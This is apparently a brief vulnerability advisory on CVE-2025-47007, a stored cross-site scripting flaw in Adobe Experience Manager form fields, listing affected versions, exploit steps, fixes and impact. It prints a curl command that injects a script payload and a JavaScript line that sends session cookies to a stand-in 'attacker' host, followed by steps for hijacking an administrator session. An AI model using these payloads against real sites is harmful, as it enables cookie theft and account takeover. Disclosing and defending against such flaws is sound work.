Adobe Experience Manager, Stored Cross-Site Scripting (XSS), CVE-2025-47007 (Critical)

Listen to this Post

How CVE-2025-47007 Works

Adobe Experience Manager (AEM) versions 6.5.22 and earlier contain a stored XSS vulnerability in form fields. Attackers with low privileges can inject malicious JavaScript payloads into these fields. When authenticated users access pages containing the compromised fields, the scripts execute in their browser context. This occurs due to insufficient input sanitization in the affected components, allowing arbitrary script injection through crafted HTTP requests. The vulnerability persists because AEM fails to properly encode user-supplied data before rendering it in web views.

DailyCVE Form

Platform: Adobe Experience Manager
Version: ≤6.5.22
Vulnerability: Stored XSS
Severity: Critical
Date: 06/16/2025

Prediction: Patch by 07/15/2025

What Undercode Say

curl -X POST 'http://target/aem/form' -d 'field=<script>alert(1)</script>'
document.location='http://attacker/steal?cookie='+document.cookie

How Exploit

1. Authenticate with low-privilege account

2. Submit malicious script via vulnerable form

3. Wait for admin to view compromised page

4. Session hijacking via cookie theft

Protection from this CVE

1. Upgrade to AEM 6.5.23+

2. Implement CSP headers

3. Sanitize form inputs

Impact

1. Session hijacking

2. Account takeover

3. Privilege escalation

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top